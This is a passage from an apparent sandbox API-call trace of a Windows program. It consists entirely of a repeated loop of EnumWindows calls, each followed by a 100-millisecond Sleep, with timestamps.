(lpEnumFunc=0x423dd0, lParam=0x410000) [0267.768] Sleep (dwMilliseconds=0x64) [0267.774] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.775] Sleep (dwMilliseconds=0x64) [0267.806] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.807] Sleep (dwMilliseconds=0x64) [0267.841] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.844] Sleep (dwMilliseconds=0x64) [0267.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.849] Sleep (dwMilliseconds=0x64) [0267.885] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.886] Sleep (dwMilliseconds=0x64) [0267.917] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.918] Sleep (dwMilliseconds=0x64) [0267.924] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.926] Sleep (dwMilliseconds=0x64) [0267.962] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0267.964] Sleep (dwMilliseconds=0x64) [0268.049] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.050] Sleep (dwMilliseconds=0x64) [0268.076] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.078] Sleep (dwMilliseconds=0x64) [0268.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.134] Sleep (dwMilliseconds=0x64) [0268.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.178] Sleep (dwMilliseconds=0x64) [0268.187] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.188] Sleep (dwMilliseconds=0x64) [0268.224] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.267] Sleep (dwMilliseconds=0x64) [0268.296] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.297] Sleep (dwMilliseconds=0x64) [0268.319] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.321] Sleep (dwMilliseconds=0x64) [0268.360] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.361] Sleep (dwMilliseconds=0x64) [0268.382] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.384] Sleep (dwMilliseconds=0x64) [0268.415] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.417] Sleep (dwMilliseconds=0x64) [0268.455] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.456] Sleep (dwMilliseconds=0x64) [0268.469] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.470] Sleep (dwMilliseconds=0x64) [0268.508] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.511] Sleep (dwMilliseconds=0x64) [0268.546] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.547] Sleep (dwMilliseconds=0x64) [0268.548] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.549] Sleep (dwMilliseconds=0x64) [0268.584] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.586] Sleep (dwMilliseconds=0x64) [0268.611] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.613] Sleep (dwMilliseconds=0x64) [0268.624] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.626] Sleep (dwMilliseconds=0x64) [0268.662] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.663] Sleep (dwMilliseconds=0x64) [0268.683] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.685] Sleep (dwMilliseconds=0x64) [0268.703] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.704] Sleep (dwMilliseconds=0x64) [0268.742] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.743] Sleep (dwMilliseconds=0x64) [0268.760] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.762] Sleep (dwMilliseconds=0x64) [0268.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.788] Sleep (dwMilliseconds=0x64) [0268.822] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.824] Sleep (dwMilliseconds=0x64) [0268.833] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.862] Sleep (dwMilliseconds=0x64) [0268.898] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.899] Sleep (dwMilliseconds=0x64) [0268.909] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.910] Sleep (dwMilliseconds=0x64) [0268.937] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.938] Sleep (dwMilliseconds=0x64) [0268.973] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.975] Sleep (dwMilliseconds=0x64) [0268.977] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0268.977] Sleep (dwMilliseconds=0x64) [0269.049] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.051] Sleep (dwMilliseconds=0x64) [0269.078] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.080] Sleep (dwMilliseconds=0x64) [0269.089] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.091] Sleep (dwMilliseconds=0x64) [0269.128] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.129] Sleep (dwMilliseconds=0x64) [0269.150] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.151] Sleep (dwMilliseconds=0x64) [0269.170] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.171] Sleep (dwMilliseconds=0x64) [0269.205] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.207] Sleep (dwMilliseconds=0x64) [0269.219] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.220] Sleep (dwMilliseconds=0x64) [0269.322] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.323] Sleep (dwMilliseconds=0x64) [0269.390] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.392] Sleep (dwMilliseconds=0x64) [0269.400] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.402] Sleep (dwMilliseconds=0x64) [0269.430] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.431] Sleep (dwMilliseconds=0x64) [0269.466] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.467] Sleep (dwMilliseconds=0x64) [0269.470] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.471] Sleep (dwMilliseconds=0x64) [0269.507] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.509] Sleep (dwMilliseconds=0x64) [0269.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.543] Sleep (dwMilliseconds=0x64) [0269.547] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.549] Sleep (dwMilliseconds=0x64) [0269.585] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.586] Sleep (dwMilliseconds=0x64) [0269.623] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.625] Sleep (dwMilliseconds=0x64) [0269.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.663] Sleep (dwMilliseconds=0x64) [0269.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.693] Sleep (dwMilliseconds=0x64) [0269.703] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.704] Sleep (dwMilliseconds=0x64) [0269.740] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.743] Sleep (dwMilliseconds=0x64) [0269.762] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.763] Sleep (dwMilliseconds=0x64) [0269.780] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.781] Sleep (dwMilliseconds=0x64) [0269.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.819] Sleep (dwMilliseconds=0x64) [0269.831] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.832] Sleep (dwMilliseconds=0x64) [0269.857] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.858] Sleep (dwMilliseconds=0x64) [0269.896] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.898] Sleep (dwMilliseconds=0x64) [0269.911] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.911] Sleep (dwMilliseconds=0x64) [0269.936] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.938] Sleep (dwMilliseconds=0x64) [0269.974] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0269.976] Sleep (dwMilliseconds=0x64) [0270.025] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.026] Sleep (dwMilliseconds=0x64) [0270.043] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.045] Sleep (dwMilliseconds=0x64) [0270.081] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.083] Sleep (dwMilliseconds=0x64) [0270.107] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.109] Sleep (dwMilliseconds=0x64) [0270.125] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.126] Sleep (dwMilliseconds=0x64) [0270.162] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.164] Sleep (dwMilliseconds=0x64) [0270.181] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.182] Sleep (dwMilliseconds=0x64) [0270.204] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.205] Sleep (dwMilliseconds=0x64) [0270.253] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.254] Sleep (dwMilliseconds=0x64) [0270.280] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.281] Sleep (dwMilliseconds=0x64) [0270.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.318] Sleep (dwMilliseconds=0x64) [0270.322] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.322] Sleep (dwMilliseconds=0x64) [0270.387] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.389] Sleep (dwMilliseconds=0x64) [0270.436] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.438] Sleep (dwMilliseconds=0x64) [0270.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.444] Sleep (dwMilliseconds=0x64) [0270.481] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.483] Sleep (dwMilliseconds=0x64) [0270.517] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.518] Sleep (dwMilliseconds=0x64) [0270.522] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.523] Sleep (dwMilliseconds=0x64) [0270.559] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.561] Sleep (dwMilliseconds=0x64) [0270.600] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.602] Sleep (dwMilliseconds=0x64) [0270.607] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.608] Sleep (dwMilliseconds=0x64) [0270.639] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.641] Sleep (dwMilliseconds=0x64) [0270.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.677] Sleep (dwMilliseconds=0x64) [0270.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.679] Sleep (dwMilliseconds=0x64) [0270.718] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.720] Sleep (dwMilliseconds=0x64) [0270.760] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.761] Sleep (dwMilliseconds=0x64) [0270.798] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.800] Sleep (dwMilliseconds=0x64) [0270.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.833] Sleep (dwMilliseconds=0x64) [0270.839] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.840] Sleep (dwMilliseconds=0x64) [0270.876] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.877] Sleep (dwMilliseconds=0x64) [0270.900] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.901] Sleep (dwMilliseconds=0x64) [0270.915] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.916] Sleep (dwMilliseconds=0x64) [0270.952] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0270.971] Sleep (dwMilliseconds=0x64) [0271.017] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.019] Sleep (dwMilliseconds=0x64) [0271.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.057] Sleep (dwMilliseconds=0x64) [0271.072] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.073] Sleep (dwMilliseconds=0x64) [0271.097] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.099] Sleep (dwMilliseconds=0x64) [0271.135] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.136] Sleep (dwMilliseconds=0x64) [0271.143] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.144] Sleep (dwMilliseconds=0x64) [0271.175] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.177] Sleep (dwMilliseconds=0x64) [0271.213] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.215] Sleep (dwMilliseconds=0x64) [0271.233] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.235] Sleep (dwMilliseconds=0x64) [0271.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.258] Sleep (dwMilliseconds=0x64) [0271.295] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.296] Sleep (dwMilliseconds=0x64) [0271.309] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.310] Sleep (dwMilliseconds=0x64) [0271.335] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.336] Sleep (dwMilliseconds=0x64) [0271.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.402] Sleep (dwMilliseconds=0x64) [0271.419] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.421] Sleep (dwMilliseconds=0x64) [0271.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.444] Sleep (dwMilliseconds=0x64) [0271.479] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.480] Sleep (dwMilliseconds=0x64) [0271.493] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.494] Sleep (dwMilliseconds=0x64) [0271.519] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.520] Sleep (dwMilliseconds=0x64) [0271.558] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.559] Sleep (dwMilliseconds=0x64) [0271.571] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.598] Sleep (dwMilliseconds=0x64) [0271.704] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.706] Sleep (dwMilliseconds=0x64) [0271.712] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.713] Sleep (dwMilliseconds=0x64) [0271.744] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.745] Sleep (dwMilliseconds=0x64) [0271.780] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.782] Sleep (dwMilliseconds=0x64) [0271.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.785] Sleep (dwMilliseconds=0x64) [0271.819] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.820] Sleep (dwMilliseconds=0x64) [0271.850] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.851] Sleep (dwMilliseconds=0x64) [0271.860] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.861] Sleep (dwMilliseconds=0x64) [0271.900] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.901] Sleep (dwMilliseconds=0x64) [0271.940] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.941] Sleep (dwMilliseconds=0x64) [0271.944] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.945] Sleep (dwMilliseconds=0x64) [0271.981] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0271.982] Sleep (dwMilliseconds=0x64) [0272.043] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.045] Sleep (dwMilliseconds=0x64) [0272.052] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.053] Sleep (dwMilliseconds=0x64) [0272.085] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.086] Sleep (dwMilliseconds=0x64) [0272.124] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.125] Sleep (dwMilliseconds=0x64) [0272.147] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.148] Sleep (dwMilliseconds=0x64) [0272.183] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.185] Sleep (dwMilliseconds=0x64) [0272.225] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.227] Sleep (dwMilliseconds=0x64) [0272.263] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.265] Sleep (dwMilliseconds=0x64) [0272.267] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.268] Sleep (dwMilliseconds=0x64) [0272.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.342] Sleep (dwMilliseconds=0x64) [0272.345] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.347] Sleep (dwMilliseconds=0x64) [0272.390] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.392] Sleep (dwMilliseconds=0x64) [0272.428] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.430] Sleep (dwMilliseconds=0x64) [0272.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.444] Sleep (dwMilliseconds=0x64) [0272.470] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.472] Sleep (dwMilliseconds=0x64) [0272.508] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.510] Sleep (dwMilliseconds=0x64) [0272.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.538] Sleep (dwMilliseconds=0x64) [0272.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.554] Sleep (dwMilliseconds=0x64) [0272.590] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.592] Sleep (dwMilliseconds=0x64) [0272.632] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.634] Sleep (dwMilliseconds=0x64) [0272.635] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.636] Sleep (dwMilliseconds=0x64) [0272.671] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.673] Sleep (dwMilliseconds=0x64) [0272.709] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.711] Sleep (dwMilliseconds=0x64) [0272.714] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.715] Sleep (dwMilliseconds=0x64) [0272.748] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.750] Sleep (dwMilliseconds=0x64) [0272.788] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.789] Sleep (dwMilliseconds=0x64) [0272.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.803] Sleep (dwMilliseconds=0x64) [0272.828] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.883] Sleep (dwMilliseconds=0x64) [0272.908] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.910] Sleep (dwMilliseconds=0x64) [0272.925] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.930] Sleep (dwMilliseconds=0x64) [0272.967] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0272.969] Sleep (dwMilliseconds=0x64) [0273.037] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.039] Sleep (dwMilliseconds=0x64) [0273.042] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.043] Sleep (dwMilliseconds=0x64) [0273.091] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.093] Sleep (dwMilliseconds=0x64) [0273.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.134] Sleep (dwMilliseconds=0x64) [0273.153] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.155] Sleep (dwMilliseconds=0x64) [0273.177] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.178] Sleep (dwMilliseconds=0x64) [0273.217] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.219] Sleep (dwMilliseconds=0x64) [0273.244] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.247] Sleep (dwMilliseconds=0x64) [0273.260] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.264] Sleep (dwMilliseconds=0x64) [0273.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.305] Sleep (dwMilliseconds=0x64) [0273.345] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.358] Sleep (dwMilliseconds=0x64) [0273.398] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.399] Sleep (dwMilliseconds=0x64) [0273.471] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.472] Sleep (dwMilliseconds=0x64) [0273.497] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.499] Sleep (dwMilliseconds=0x64) [0273.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.537] Sleep (dwMilliseconds=0x64) [0273.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.561] Sleep (dwMilliseconds=0x64) [0273.578] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.580] Sleep (dwMilliseconds=0x64) [0273.619] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.621] Sleep (dwMilliseconds=0x64) [0273.648] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.651] Sleep (dwMilliseconds=0x64) [0273.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.663] Sleep (dwMilliseconds=0x64) [0273.701] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.703] Sleep (dwMilliseconds=0x64) [0273.740] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.742] Sleep (dwMilliseconds=0x64) [0273.743] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.744] Sleep (dwMilliseconds=0x64) [0273.779] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.781] Sleep (dwMilliseconds=0x64) [0273.820] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.822] Sleep (dwMilliseconds=0x64) [0273.830] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.832] Sleep (dwMilliseconds=0x64) [0273.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.866] Sleep (dwMilliseconds=0x64) [0273.908] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.910] Sleep (dwMilliseconds=0x64) [0273.932] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0273.951] Sleep (dwMilliseconds=0x64) [0274.116] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.121] Sleep (dwMilliseconds=0x64) [0274.199] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.201] Sleep (dwMilliseconds=0x64) [0274.206] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.207] Sleep (dwMilliseconds=0x64) [0274.246] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.247] Sleep (dwMilliseconds=0x64) [0274.283] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.285] Sleep (dwMilliseconds=0x64) [0274.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.302] Sleep (dwMilliseconds=0x64) [0274.324] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.326] Sleep (dwMilliseconds=0x64) [0274.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.367] Sleep (dwMilliseconds=0x64) [0274.390] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.392] Sleep (dwMilliseconds=0x64) [0274.411] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.413] Sleep (dwMilliseconds=0x64) [0274.452] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.453] Sleep (dwMilliseconds=0x64) [0274.478] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.479] Sleep (dwMilliseconds=0x64) [0274.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.497] Sleep (dwMilliseconds=0x64) [0274.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.537] Sleep (dwMilliseconds=0x64) [0274.577] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.579] Sleep (dwMilliseconds=0x64) [0274.585] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.586] Sleep (dwMilliseconds=0x64) [0274.618] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.660] Sleep (dwMilliseconds=0x64) [0274.675] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.676] Sleep (dwMilliseconds=0x64) [0274.699] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.701] Sleep (dwMilliseconds=0x64) [0274.737] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.739] Sleep (dwMilliseconds=0x64) [0274.775] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.777] Sleep (dwMilliseconds=0x64) [0274.783] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.784] Sleep (dwMilliseconds=0x64) [0274.821] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.823] Sleep (dwMilliseconds=0x64) [0274.859] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.860] Sleep (dwMilliseconds=0x64) [0274.863] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.865] Sleep (dwMilliseconds=0x64) [0274.900] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.902] Sleep (dwMilliseconds=0x64) [0274.940] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.941] Sleep (dwMilliseconds=0x64) [0274.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.943] Sleep (dwMilliseconds=0x64) [0274.980] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0274.982] Sleep (dwMilliseconds=0x64) [0275.046] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.048] Sleep (dwMilliseconds=0x64) [0275.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.052] Sleep (dwMilliseconds=0x64) [0275.091] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.093] Sleep (dwMilliseconds=0x64) [0275.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.131] Sleep (dwMilliseconds=0x64) [0275.141] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.142] Sleep (dwMilliseconds=0x64) [0275.174] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.176] Sleep (dwMilliseconds=0x64) [0275.214] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.228] Sleep (dwMilliseconds=0x64) [0275.255] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.257] Sleep (dwMilliseconds=0x64) [0275.293] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.298] Sleep (dwMilliseconds=0x64) [0275.316] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.318] Sleep (dwMilliseconds=0x64) [0275.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.342] Sleep (dwMilliseconds=0x64) [0275.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.384] Sleep (dwMilliseconds=0x64) [0275.437] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.439] Sleep (dwMilliseconds=0x64) [0275.445] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0275.447] Sleep (dwMilliseconds=0x64) [0275.485] 